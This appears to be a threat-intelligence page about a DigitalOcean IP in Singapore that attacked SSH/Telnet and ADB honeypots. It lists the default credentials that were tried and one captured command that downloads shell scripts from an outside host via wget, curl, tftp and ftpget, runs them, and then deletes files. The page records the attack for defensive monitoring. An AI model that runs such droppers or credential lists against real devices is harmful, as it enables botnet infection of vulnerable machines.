Active Threat β’ HIGH
165.22.252.236
Country of OriginπΈπ¬ Singapore
First Detection3/27/2026
Last Activity3/29/2026
ISPDigitalOcean, LLC
π―
154
Total Attacks
π
2
Ports
π‘
2
Attack Types
π¦
2
Malware
Geolocation
- Country
- πΈπ¬ Singapore
- City
- Singapore
- ASN
- AS14061
- ISP
- DigitalOcean, LLC
Attack Types
ssh_telnet_honeypot
adb_honeypot
Attacked Ports
235555
Associated Malware
Attempted Credentials
πroot/icatch99
2xπroot/(empty)
2xπadmin/admin
2xπroot/vizxv
1xπadmin/anko
1xπadmin/(empty)
1xπadmin/system
1xπroot/123456
1xπsupport/support
1xπadmin/123456
1xπroot/anko
1xπroot/86981198
1xπtelnet/telnet
1xπubnt/ubnt
1xπroot/toor
1xExecuted Commands
$
echo hello3x$
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://206.189.22.92/1.sh; curl -O http://206.189.22.92/1.sh; chmod 777 1.sh; sh 1.sh; tftp 206.189.22.92 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 206.189.22.92; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 206.189.22.92 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3.sh 2.sh; rm -rf *1xShodan InternetDB ExposureShodan
InternetDB data, not real-time
Ports
47001
Risk Assessment
60
/100
LowMediumHighCritical